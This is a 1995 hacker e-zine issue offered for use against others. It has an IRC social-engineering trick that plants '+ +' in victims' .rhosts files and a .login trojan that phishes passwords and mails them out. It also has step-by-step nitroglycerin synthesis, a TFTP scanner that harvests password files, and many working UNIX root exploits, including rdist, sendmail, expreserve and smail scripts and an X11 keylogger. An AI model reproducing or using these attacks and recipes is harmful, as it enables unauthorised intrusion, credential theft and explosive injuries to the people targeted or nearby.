TYM - Taking Your Machine PRESENTS -+-+-====================================================================-+-+- ____________ ____ _____ _____ _________ /\____ ____\ /\ \ /\ \ /\ \ /\ _____\ \/___/\ \___/ \ \ \ \ \ \\ \ \ \ \___ / \ \ \ \ \ \ \ \ \\ \\ \ \ \ __\ \ \ \ \ \ \ \ \ \ \__\ \ \ \ \ \_/___ \ \__\ \ \___\ \ \__\/__/\ \__\ \ \_______\ \/__/ \/___/ \/__/ \/__/ \/_______/ _________ ______ ________ _________ /\ _____\ /\ __ \ /\ __ \ /\ ___ \ \ \ \___ / \ \ \/\ \ \ \ \_\ \ \ \ \_/\ \ \ \ __\ \ \ \ \ \ \ \ / \ \ \\_\ \ \ \ \_/ \ \ \_\ \ \ \ \\ \ \ \ ___ \ \ \__\ \ \_____\ \ \__\\_\ \ \__\_/\__\ \/__/ \/_____/ \/__//_/ \/__/ \/__/ ________ ___ ___ ________ _____ ___ ________ _______ /\ ____\ /\ \ /\ \ /\ __ \ /\ \ /\ \ /\ ____\ /\ ___\ \ \ \ \ \ \\_\ \ \ \ \/\ \\ \ \ \\ \ \ \ \ \_ _/_\ \ \__/ \ \ \ \ \ ___ \ \ \ \_\ \\ \ \\ \ \ \ \ \ \/\_ \\ \ _\ \ \ \____ \ \ \_/\ \ \ \ __ \\ \ \/\ \\ \ \ \ \/_\ \\ \ \/__ \ \______\ \ \__\\ \__\ \ \__\ \__\\ \__\//\_____\ \ \_______\\ \_____\ \/______/ \/__/ \/__/ \/__/\/__/ \/__/ \/_____/ \/_______/ \/_____/ -+-+-====================================================================-+-+- Time For A Change Volume 1 - Issue 1 February 23, 1995 -+-+-====================================================================-+-+- INTRODUCTION ____________ Well, here is our first, long awaited issue. For those of you who don't know me, I'm Ghost in the Machine. I've been around the "scene" forever and a day, and I am quite sick of what it has degenerated into. This magazine is an attempt to break away from the no-disclosure bullshit and give everyone all the info they need to do whatever they want to do. This is an attempt at full-discolure, useful information, while hopefully remaining entertaining to read. Submissions for this magazine are accepted from anyone who has the desire to write an interesting article, and also has the ability to do so. Send your submissions to: Ghost in the Machine @ Hackers Haven BBS (303) 343-4053 or bf130@freenet.hsc.colorado.edu (Don't laugh, it's a stable maildrop) You can also feel free to drop any comments, suggestions, complaints, etc.. off at either of those places. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= TABLE OF CONTENTS: 1. Finding new domains and playing with them.............Ghost in the Machine 2. Fun stuff to do on IRC................................Terminal 3. Pyrotechnics for the Serious Student:Nitro-Glycerine..Murcurochrome 4. UNIX Problems for fun and exploit: Part 1.............Ghost in the Machine =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ----------------------------------------------------------------------------- Time for a Change presents Finding new domains and playing with them. by Ghost in the Machine +----------------------------------------------------------------------------+ If you're like me, you will occasionally find yourself bored and want to find someplace new to hack. Coming up with a domain that you haven't already visited might be giving you some headaches, I know it gives them to me. Here are some pointers on how to find new systems, what to do once you have found one to gain easy access (if it exists), and some other neat net tools that you might not be familiar with. - FINDING DOMAINS - If you are on a system with any activity at all, you will find it easy to find new hosts by just checking the processes running on your host. do a % ps -aux | grep telnet or even better, look at all the processes and pipe it through more. % ps -aux | more A lot of times, you will get people telnetting, rlogin'ing etc.. to different places.. a lot of times they are muds or whatever, which is kinda lame, but hell, it's someplace to start. + % finger @ This will give you a list of all the people logged in, and many times, where they are on that host from. There are usually a handful from someplace nowhere near the host that you are fingering. + Read usenet. Preferrably *security* newsgroups, as often times, stupid admins will leave valuable system weaknesses in posts, along with their login name, and host. + Jump on to IRC. Join random, heavily populated channels. Do a /who # . There should be a hefty load of new domains in just that. Some channels that usually have a lot of people on domestic machines are: #talk # #warez-#warez9 (these are usually filled with clueless wonders too, always a good time) # + Get on the www. Check out where the links are taking you, alas more domains to play with. Usually chock full of usernames. + I'm sure you can come up with plenty of other variations on this theme. Finding domains is easy, just pick something that appeals to you, and go at it. - USING YOUR NEW DOMAINS - Ok, the first thing you might want to do once you find a new domain is scan it for easily hacked backdoors. ISS (Internet Security Scanner) is a program that will do this for you, SATAN is another. I will include a uuencoded gzip of ISS 1.21 source with this issue. If you're really bored, you can scan by hand. Important Note: Never, NEVER scan a domain with a non-expendable account. Most of the things that ISS does are easily logged and quite noticable. + Question: I have a domain name, but I need the IP address to use with ISS. Answer: Use nslookup - nslookup is a program that will attach to a nameserver and translate domain to IP and vice versa. It's very easy to use. type nslookup Then at the > prompt, type either fully qualified host names, or ip addresses. It will spit the info you desire. + Question: Is there a way to easily scan a domain for default accounts? Answer: Yes - netfind netfind is a handy program for finding accounts without actually entering the system. It is very versatile, and very helpful. % man netfind for complete instructions. + These are some easy ways to find stuff. I hope you find them useful. ----------------------------------------------------------------------------- Time for a Change presents Fun stuff to do on IRC. by Terminal ------------------------------------------------------------------------------ The Intro: By writing this text i intend to share some simple ideas on gaining accounts, and access on other systems while pissing around on IRC. I assume, you the reader have a little experience with the commands of IRC... I dont know why, but I do... So lets get on with it. The Beginning: To find a person on a system of your choice try: /who -host . For example: "/who -host *att.com" would find all users on IRC coming from any host on ATT.COM.. Wildcards are indeed excepted. So find a victim that way, or if you are less picky, just join any channel, preferably one with a few users, and do a: "/who *".. that will list all users in the channel with nick, and mailing address... So, chose a user that looks interesting, and move on. The Idea: Well, we are just trying to accomplish one thing... to get the user to add "+ +" to his or her .rhosts file.. making any system a 'trusted' host, then allowing us, to rlogin (Remote Login) to his or her system with no password... So, we have a few choices.. as you may have seen there are some popular IRC scripts..IRC scripts are used by many people on IRC for whatever reason or another. and to get into there system you need only to add a line to a popular IRC script, or make your own.. the line you would want to add, would look like this: "exec echo + + > $HOME/.rhosts"... You dont have to have to give them an IRC script to get them to fix there .rhosts.. with a stupid user, and a bit of luck, you can have the user type it in himself. When actually typed while in IRC, you would need to add a '/' to the whole thing, making it: "/exec echo + + > $HOME/.rhosts"... Once the '+ +' is added to the .rhosts, you need only, exit to shell.. and type: "rlogin -l ".For example, to rlogin to joblo@anysystem.com, you would need to type: "rlogin anysystem.com -l joblo" from your shell... The Example: *Victim* Dude, do you have any IRC scripts?? /whois Victim *** Victim is victim@any.system.net (John Doe) *** on channels: #oralsex *** on irc via server irc-2.mit.edu () /exec echo "exec echo + + > $HOME/.rhosts" >> fenix.irc /dcc send Victim fenix.irc *** Sent DCC SEND request to Victim *** DCC SEND connection to Victim[123.456.0.0,1383] established *** DCC SEND:/home/myuser/fenix.irc to Victim completed 0.04004 kb/sec /msg victim just type: /load fenix.irc -> *victim* just type: /load fenix.irc *Victim* Ok, I did... thanks. /msg victim no problem. -> *victim* no problem. /quit I am lame *** Signoff: me (I am lame) % rlogin any.system.net -l victim Last login: Tue Feb 14 16:49:42 from secure.bellcore.com SunOS Release 4.1.3 (ANY) #2: Fri Sep 9 06:12:28 PDT 1994 Default terminal emulation is vt100 For temporary storage please use /tmp You have mail. ANY% ls misc_porno littleboy_nudes ANY% exit Connection closed. % The Other Idea: if you want to try something different, You could give out a .login 'trojan' shell script, that when run replaces the users .login file with a script wich when the user logs in next, will make it look like the user entered a wrong login name or password, and will prompt them to reenter it... What ever is inputed then, is mailed to the address in the script, so you would want to modify it, with your own mailing address... You could distribute the script as anything you like, but it isnt an IRC script, so it needs to be run from the users shell... If you are rlogined to someones account, you may want to run this on their account to try and get their passwd... The Script: ----START SCRIPT---- #!/bin/sh rm -rf $0 cp $HOME/.login $HOME/.l echo ''>$HOME/.hushlogin echo "stty intr '^@' echo 'Login incorrect' echo -n 'login: ' echo $<>.t echo -n 'Password: ' stty -echo echo $<>>.t mail yourname@your.mail.account.com<.t rm .t cat /etc/motd mv .l .login rm .hushlogin stty echo source .login">$HOME/.login ----END SCRIPT---- =========================================================================== Time for a Change presents Pyrotechnics for the Serious Student Part I: Nitro Glycerine by Murcurochrome (303) ------------------------------------------------------------------------------ Being the most experienced and knowledgable pyrotechnic in the state, I figured that it would be in all of our best concerns for me to write this article, instead of some lame-ass who steals all his ideas from the Anarchist Cookbook or the Terrorist Handbook without even trying any of them. I have made numerous explosives in my time, and now it is time for me to share them with you. I will be submitting new articles to each TYM release, and they will each include one recipe for some type of explosive. First off, I have to say that I am in NO FUCKING WAY responsible for any dismemberment, or other harm that may come to you or anyone else. It's not my fault if you picked up this article and decided that you were a terrorist. For this reason, I have rated each one twice. One for difficulty in making, and one for danger in creating/using it. So, that's all I can do to make sure that you dumbasses don't think that nitroglycerin is easy and fun to make. So, lets begin. Nitroglycerin C3H5(NO3)3 ------------------------------- Difficulty level [09] Danger level [10] -------------------------------------------------------- Nitroglycerin is the most dangerous and most potent explosive that I am going to teach you in this article. It is highly volitile to bumps and jiggles, so I suggest that you merely read this article for the fun of knowing it, rather than actually making it. I've only made it a few times, and got away with it, but for you, it could prove dangerous. [01] Fill a 75-ml beaker to the 13ml line with fuming red nitric acid, of 98% concentration. [02] Place the beaker in an ice bath. Let it cool down below room temperature. [03] When it's done cooling, add it to 3x the amount of fuming sulfuric acid (of 99% concentration). [04] When done mixing, lower the temperature by adding more ice to the bath, to about 10-15øC [05] When the solution has cooled, it is ready to add glycerin. Be sure to add the glycerin slowing, THROUGH A MEDICINE DROPPER, ONE DROP AT A TIME. Do this carefully, until the entire surface of the solution is covered in glycerin. [06] Nitration will begin as soon as the glycerin is added. This will produce heat, but you MUST keep the solution below 30øC. If it begins to go higher, take the beaker out and pour it in the ice bath. This will prevent an explosion. [07] For the first 10 minutes of nitration, stir gently. Normally, a layer of nitroglycerin will form on top of it all. [08] After nitration, the entire beaker should be transferred SLOWLY and CAREFULLY to another beaker of water. The nitroglycerin should go to the bottom, and the excess acid and water can be drained off. [09] After removing as much acid as possible (* be sure not to disturb the nitroglycerin, it is highly volital at this point *), remove the NG with an eyedropper and place it in a sodium bicarbonate solution. This will neutralize most of the remaining acid. Keep doing this step, and testing with blue litmus paper until it shows no acid. [10] Finally, remove the NG from the bicarbonate with an eye dropper. Must I remind you to do this SLOWLY and CAREFULLY? NG has a very short shelf life, and is extremely unstable. The best way to keep NG around, is to convert it to dynamite by adding sawdust, or soap shavings. ----------------------------------------------------------------------------- Time for a Change presents UNIX problems, for fun and exploit. Volume 1. (or how to get root in less than 5 minutes.) by Ghost in the Machine ------------------------------------------------------------------------------ Well, I have yet to see a definative guide to UNIX bugs, holes, etc.. with exploits, so I feel confident that I am not beating a dead horse with this series. Everyone seems to want to hack *NIX, and although the majority of bugs, holes, and other problems are easy to find if you know where to look, most people do not have any idea where to start looking. This series should give even the most incurably lame people a starting point. The current plan is to make this a 4 part series, however, as more and more goodies show up, one never knows. Basically, here is an example for the format of the file: (vers) - - : +++++ ------------------------------------------------------------------------------ AIX (all?) - /bin/tprof - tprof -x executes programs suid 0 - root in 16 characters, how can you lose? : % tprof -x /bin/sh # +++++ AIX (2.2.1) - /etc/shadow - /etc/shadow is o+w - Big oopsie. Thanks IBM! : % echo "rewt::0:0:blahness:/:/bin/sh" >> /etc/shadow % telnet localhost Trying... Connected to haqdnfuqd.com. Escape character is '^]'. login: rewt # +++++ AIX (3.X.X) - -froot - rlogind hole : % rlogin localhost -l -froot # +++++ BSD (4.2), ULTRIX (3.0) - symbolic links broke - view any file you care to. : % ln -s /etc/shadow /home/looser/.plan % finger looser Login: looser Name: looser Directory: /home/looser Shell: /bin/sh Last Login Fri May 13 22:10 (EST) on ttya1 No Mail. +++++ DYNIX (3.0.14), ULTRIX (2.X) - sendmail bug - Can read any file. : $ sendmail -C /etc/shadow +++++ DYNIX (all?), IRIX (all?) - rsh problem - can execute commands as root. : $ rsh localhost -l "" /bin/sh # +++++ HP/UX (below 7.0) - chfn problem - chfn accepts newlines, etc... : % chfn -f looser^Mrewt::0:0::/:/bin/sh % rlogin localhost -l rewt Warning: .lastlogin not found. # +++++ UNIX sendmail (Confirmed on SunOS perhaps others) - decode alias - uudecode : % telnet fuqdhost.com 25 220 fuqdhost.com SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST) VRFY decode 250 <|/usr/bin/uudecode> MAIL FROM: bin 250 ... Sender Okay RCPT TO: decode 250 ... Recipient Okay DATA 354 Enter mail, end with "." on a line by itself begin 644 /bin/.rhosts $*R K"O\ end . 250 Mail accepted quit 221 fuqdhost.com closing connection Connection closed by foreign host. % rlogin fuqdhost.com -l bin $ +++++ UNIX ALL - tftp - Can be used to grab /etc/passwd or any file you like - Most systems have fixed this. : % tftp fuqdhost.com tftp> get /etc/passwd tftp> quit % ls passwd passwd % (For your scanning pleasure, I am including a short script written by Yo) -------------------------------CUT HERE------------------------------------- #!/bin/sh ######################################################################## # TFTP snagger by Yo # It snags /etc/passwd files from all hosts with open 69 (tftp) port. # scanns all hosts from XX.XX.0.0 - XX.XX.255.255 # you can run it in the background in following way: # snag [hostname] > /dev/null & # [hostname] might be used IP # (with -ip option) as well as FQDN # ######################################################################### if [ $1x = x ]; then echo " Usage: $0 [hostname] to run in the foreground " echo " $0 [hostname] > /dev/null & to run in the background " echo " The [hostname] can be specialized in fully qualified domain name " echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. " echo " as well as IP with -ip option. " exit 1 else if [ "$1" = '-ip' ]; then if [ $2x = x ]; then echo " Usage: $0 $1 the IP " exit 1 else x=`echo $2 | cut -c1-3` x1=`echo $x | cut -c2` if [ "$x1" = '.' ]; then x=`echo $x | cut -c1` xx=`echo $2 | cut -c3-5` else x1=`echo $x | cut -c3` if [ "$x1" = '.' ]; then x=`echo $x | cut -c1-2` xx=`echo $2 | cut -c4-6` else xx=`echo $2 | cut -c5-7` fi fi x1=`echo $xx | cut -c2` if [ "$x1" = '.' ]; then xx=`echo $xx | cut -c1` else x1=`echo $xx | cut -c3` if [ "$x1" = '.' ]; then xx=`echo $xx | cut -c1-2` else xx=`echo $xx | cut -c1-3` fi fi fi else if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then # -x is for SunOs echo sorry dude, no nslookup server .. try it with -ip option. exit 1 fi x=`nslookup $1 | fgrep "Address" | cut -c11-13 | tail +2` x1=`echo $x | cut -c2` if [ "$x1" = '.' ]; then x=`echo $x | cut -c1` xx=`nslookup $1 | fgrep "Address" | cut -c13-15 | tail +2` else x1=`echo $x | cut -c3` if [ "$x1" = '.' ]; then x=`echo $x | cut -c1-2` xx=`nslookup $1 | fgrep "Address" | cut -c14-16 | tail +2` else x=`echo $x | cut -c1-3` xx=`nslookup $1 | fgrep "Address" | cut -c15-17 | tail +2` fi fi x1=`echo $xx | cut -c2` if [ "$x1" = '.' ]; then xx=`echo $xx | cut -c1` else x1=`echo $xx | cut -c3` if [ "$x1" = '.' ]; then xx=`echo $xx | cut -c1-2` else xx=`echo $xx | cut -c1-3` fi fi fi fi if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then echo There is no such domain. Nothing to scan . exit 1 fi xxx=0 xxxx=0 while [ $x -ne 255 ]; do while [ $xx -ne 255 ]; do while [ $xxx -ne 255 ]; do while [ $xxxx -ne 255 ]; do target=$x.$xx.$xxx.$xxxx trap "echo The Process was stoped at $target;rm -rf passwd; exit 1" 2 tftp << EOF c $target mode ascii trace get /etc/passwd passwd quit EOF if [ ! -s passwd ] ; then rm -rf passwd echo `date` $target has rejected an attempt >> .info else mv passwd .good.$target echo `date` $target is taken,all data is stored in .good.$target file >> .info fi xxxx=`expr $xxxx + 1 ` done xxxx=0 xxx=`expr $xxx + 1 ` done xxx=0 xx=`expr $xx + 1 ` done xx=0 x=`expr $x + 1 ` done ---------------------------------CUT HERE----------------------------------- +++++ SunOS (<4.1.2), A/UX (2.0.1), SCO (3.2v4.2), Many others. - rdist(1) problem - Any user with access to rdist(1) can become root. : % cat > distfile HOSTS = fuqdhost FILES = w00p ${FILES} -> ${HOSTS} install /tmp/1; notify user; ^D % cat > usr.c main() { setuid(0); chown("goodie", 0, 0); chmod("goodie", 04755); exit(0); } ^D % cp /bin/sh ./goodie % cc -o usr usr.c % set path=( . $PATH) % setenv IFS / % rdist updating host localhost rdist: w00p: no such file or directory notify @fuqdhost ( user ) % goodie # +++++ UNIX (with rdist) - rdist buffer overflow hole - Make an suid shell. : ----------------------------------CUT HERE---------------------------------- #!/bin/sh SUID=/tmp/xtrek cat <<_EOF_ > test Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaa Scp /bin/sh $SUID Schmod 4755 $SUID _EOF_ cat test | /usr/ucb/rdist -Server localhost rm -rf test if [ -f $SUID ]; then echo "$SUID is a setuid shell. " fi # ----------------------------------CUT HERE----------------------------------- % rdist.sh /tmp/xtrek is a setuid shell. % /tmp/xtrek # +++++ UNIX (Many) - getpwent() hole - get /etc/shadow file. (not usually) : % cat > unshadow.c #include main(){struct passwd *p;while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n\r", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);} ^D % cc -o unshadow % unshadow > gotcha % cat gotcha +++++ UNIX (elm - all versions) - autoreply bug - any user with access to autoreply can become root. : --------------------------------CUT HERE------------------------------------ #!/bin/sh # # fixrhosts rhosts-file user machine # if [ $# -ne 3 ]; then echo "Usage: `basename $0` rhosts-file user machine" exit 1 fi RHOSTS="$1" USERNAME="$2" MACHINE="$3" cd $HOME echo x > "a $MACHINE $USERNAME b" umask 022 autoreply "a $MACHINE $USERNAME b" cat > /tmp/.rhosts.sh.$$ << 'EOF' ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'` exec autoreply off exit 0 EOF /bin/sh /tmp/.rhosts.sh.$$ $RHOSTS rm -f /tmp/.rhosts.sh.$$ "a $MACHINE $USERNAME b" exit 0 --------------------------------CUT HERE------------------------------------ % ./fixrhosts ~root/.rhosts looser fuqdhost You've been added to the autoreply system. You've been removed from the autoreply table. % rsh fuqdhost -l root csh -i # +++++ UNIX (smail) - debug mode hole - Use of ~/.forward and debug lets a local user read any file on the system. : % ln -s /etc/shadow .forward % ls -la .forward lrwxrwxrwx 1 looser lusers 11 Sep 5 12:08 .forward -> /etc/shadow % telnet localhost smtp Trying 127.0.0.1... Connected to fuqdhost. Escape character is '^]'. 220 fuqdhost.lame.com Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 EST debug 20 250 Debugging level: 20 expn looser [lots of crap] expand_string(~/.forward, /home/looser, looser) called expand_string returns /home/looser/.forward dtd_forwardfile: opening forward file /home/looser/.forward [more crap] read 890 bytes director dotforward: matched looser, forwarded to root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7::: bin:*:8000:0:99999:7::: daemon:*:8000:0:99999:7::: nobody:*:8000:0:99999:7::: looser:qWerTy3210xXx:8000:0:99999:7::: [....] process_field: entry We have a group We have a group process_field: error: recursive address group 550 looser ... not matched quit 221 fuqdhost.lame.com closing connection Connection closed by foreign host. +++++ UNIX (smail) - smail create/append hole - Smail called with the -D flag will allow you to create and append to any file on the system. : % cat ~/.forward localhost loser ^D % smail -bs -D ~root/.rhosts -v20 220 fuqdhost.lame.com Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 EST expn looser 250 looser quit 221 fudqhost.lame.com closing connection % rsh -l root localhost tcsh\ -i Warning: no access to tty (Bad file number). Thus no job control in this shell. # +++++ UNIX (smail) - .forward problem - Files specified in ~/.forward can be created in any directory, regardless of it's permissions. (File is still owned by mailbox owner, however.) : % echo "/etc/nologin" > ~/.forward % mail -r root loser < /dev/null % echo "Site shutdown due to smail lameness" >! /etc/nologin % rlogin localhost Site shutdown due to smail lameness rlogin: connection closed. +++++ UNIX (expreserve) - expreserve bug : ----------------------------------CUT HERE----------------------------------- /* * Exploit a security hole in expreserve on sun4.1.3 * filename * overwrites filename as root with garbage, chown's to you * (note, a 4.1.1 test overwrote with no chown * the first 4 characters written are "+ +\n" * which can be used to overwrite anyones .rhosts as root) */ #include #include #define HBLKS 2 #define FNSIZE 128 #define BLKS 900 typedef struct { time_t time; int uid; int flines; char name[FNSIZE]; short Blocks[BLKS]; short encrypted; } header; main(argc,argv) int argc; char **argv; { int p,u; header H; struct passwd *pw; char buf[100],*dest; if(argc!=2) { printf("usage: %s destination\n",argv[0]); exit(1); } dest = argv[1]; p = getpid(); pw = getpwuid(getuid()); sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p); symlink(dest,buf); close(0); if(open("./Ex",O_RDWR|O_CREAT,0666)<0) { printf("Cant open Ex (temp file)\n"); exit(2); } /* fill out header so that expre thinks its legit */ H.time = 12345; /* who cares */ strcpy(&H.time,"+ +\n"); /* its a long, we got some free bytes in there*/ strcpy(H.name,"NoName"); H.flines = 0; H.uid = getuid(); H.Blocks[0] = HBLKS; H.Blocks[1] = HBLKS+1; write(0,&H,sizeof(H)); lseek(0,0,0); printf("Made temp file 'Ex'. You can remove it when done.\n"); execl("/usr/lib/expreserve","expreserve",0); printf("Couldnt exec!\n"); } --------------------------------CUT HERE------------------------------------ % cc -o xp xp.c % id uid=666(looser) gid=50(luser) groups=50(luser) % xp /home/doofus/.rhosts % rlogin fuqdhost -l doofus % id uid=303(doofus) gid=50(luser) groups=50(luser) % +++++ SunOS 5.2 (sendmail 8.6.X) - sendmail bug - can get a root shell : ---------------------------------CUT HERE----------------------------------- #!/bin/sh # exploit new sendmail bug to give us a root shell # 24 mar 94 jwa/scd @nau.edu # "short version" # tested on sunos 5.2/sendmail 8.6.4 # location of sendmail SENDMAIL=/usr/lib/sendmail # location of original sendmail.cf file CONFIG=/nau/local/lib/mail/sendmail.cf #CONFIG=`strings $SENDMAIL | grep sendmail.cf` # program to execute as root SHELL=/bin/csh TEMPDIR=/tmp/sendbug-tmp.$$ mkdir $TEMPDIR chmod 700 $TEMPDIR cd $TEMPDIR cp $SENDMAIL sm chmod 700 sm echo "Creating setid0 ..." cat > setid.c << _EOF_ /* set uid to zero, thus escaping the annoying csh and solaris sh * problem.. * * if (getuid() != geteuid()) { * printf("permission denied, you root-hacker you.\n"); * exit(1); * } * * .. must be run euid 0, obviously. with no args it runs /bin/sh, * otherwise it runs the 1st arg. */ #include main(argc, argv) int argc; char *argv[]; { int uid; setuid(0); setgid(0); seteuid(0); /* probabally redundant. */ setegid(0); uid = getuid(); if (uid != 0) { printf("setuid(0); failed! aborting..\n"); exit(1); } if (argc !=2) { printf("executing /bin/sh...\n"); system("/bin/sh"); } else { printf("executing %s...\n", argv[1]); system(argv[1]); } } _EOF_ cc -o setid0 setid.c echo "Creating calc..." cat > calc.c << _EOF_ /* * Determines offset in sendmail of * sendmail.cf file location. * author: timothy newsham */ #include gencore() { int pid; int fd[2]; if(pipe(fd) < 0) { perror("pipe"); exit(1); return(0); } pid = fork(); if(!pid) { int f = open("./out", O_RDWR|O_CREAT, 0666); dup2(f, 1); dup2(fd[0], 0); close(f); close(fd[1]); close(fd[0]); execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0); perror("exec"); exit(0); } else { sleep(2); kill(pid, 11); } close(fd[0]); close(fd[1]); } main(argc,argv) char **argv; int argc; { unsigned int ConfFile,tTdvect,off; gencore(); sync(); /* grr. */ tTdvect = find("ZZZZZZZZ", "core"); ConfFile = find(argv[1], "core"); if(!tTdvect || !ConfFile) { return(1); } off = ConfFile - tTdvect; printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n", off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \ off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10); } int find(pattern, file) char *pattern,*file; { int fd; int i, addr; char c; fd = open(file, 0); i = 0; addr = 0; while(read(fd, &c, 1) == 1) { if(pattern[i] == c) i++; else i=0; if(pattern[i] == '\0') { addr -= strlen(pattern); return(addr); } addr++; } return(0); } _EOF_ cc calc.c -o calc echo "Scanning core image for $CONFIG..." DEBUGFLAGS=`calc $CONFIG` echo "Creating alias.sh ..." echo "#!/bin/sh # this program will be executed when mail is sent to the fake alias. # since solaris sh and csh and tcsh refuse to run when euid != realuid, # we instead run the program we compiled above. /bin/chmod 6777 $TEMPDIR/setid0 /bin/chown root $TEMPDIR/setid0 /bin/sync " > alias.sh chmod 755 alias.sh echo "Creating fake alias file..." echo "yash: |$TEMPDIR/alias.sh" > aliases echo "Faking alias pointer in new config file..." egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf echo " # hacks follow OA/$TEMPDIR/aliases # our fake alias file Ou0 # user ID to run as Og0 # group ID to run as DZWHOOP-v1.0" >> /tmp/sm.cf echo "Creating the sendmail script..." cat > sendmail.script << _EOF_ helo mail from: rcpt to: data yet another sendmail hole? suid whoop? \. # oops.. delete \ prior to execution quit _EOF_ echo "Executing $SENDMAIL $DEBUGFLAGS -bs..." $SENDMAIL $DEBUGFLAGS -bs < sendmail.script # give it time to execute. sleep 4 # cleanup in 5 seconds (sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) & if [ -u setid0 ] then echo "setid0 is a suid shell. executing..." cd / $TEMPDIR/setid0 /bin/csh echo "end of script." exit 0 else echo "setid0 is not suid; script failed." echo "apparently, you don't have the bug. celebrate :-)" exit 1 fi ---------------------------------CUT HERE----------------------------------- % sm.sh setid0 is a suid shell. executing... # +++++ UNIX (X11) - Xserver hole - Get keypresses from other xterms : ---------------------------------CUT HERE------------------------------------ /* To compile, run it through your favorite ansi compiler something like * this : * * gcc -o xkey xkey.c -lX11 -lm * * To run it, just use it like this : xkey displayname:0 * and watch as that display's keypresses show up in your shell window. * * Dominic Giampaolo (nick@cs.maxine.wpi.edu) */ #include #include #include #include #include #include #include char *TranslateKeyCode(XEvent *ev); Display *d; void snoop_all_windows(Window root, unsigned long type) { static int level = 0; Window parent, *children, *child2; unsigned int nchildren; int stat, i,j,k; level++; stat = XQueryTree(d, root, &root, &parent, &children, &nchildren); if (stat == FALSE) { fprintf(stderr, "Can't query window tree...\n"); return; } if (nchildren == 0) return; /* For a more drastic inidication of the problem being exploited * here, you can change these calls to XSelectInput() to something * like XClearWindow(d, children[i]) or if you want to be real * nasty, do XKillWindow(d, children[i]). Of course if you do that, * then you'll want to remove the loop in main(). * * The whole point of this exercise being that I shouldn't be * allowed to manipulate resources which do not belong to me. */ XSelectInput(d, root, type); for(i=0; i < nchildren; i++) { XSelectInput(d, children[i], type); snoop_all_windows(children[i], type); } XFree((char *)children); } void main(int argc, char **argv) { char *hostname; char *string; XEvent xev; int count = 0; if (argv[1] == NULL) hostname = ":0"; else hostname = argv[1]; d = XOpenDisplay(hostname); if (d == NULL) { fprintf(stderr, "Blah, can't open display: %s\n", hostname); exit(10); } snoop_all_windows(DefaultRootWindow(d), KeyPressMask); while(1) { XNextEvent(d, &xev); string = TranslateKeyCode(&xev); if (string == NULL) continue; if (*string == '\r') printf("\n"); else if (strlen(string) == 1) printf("%s", string); else printf("<<%s>>", string); fflush(stdout); } } #define KEY_BUFF_SIZE 256 static char key_buff[KEY_BUFF_SIZE]; char *TranslateKeyCode(XEvent *ev) { int count; char *tmp; KeySym ks; if (ev) { count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL); key_buff[count] = '\0'; if (count == 0) { tmp = XKeysymToString(ks); if (tmp) strcpy(key_buff, tmp); else strcpy(key_buff, ""); } return key_buff; } else return NULL; } --------------------------------CUT HERE------------------------------------ +++++ 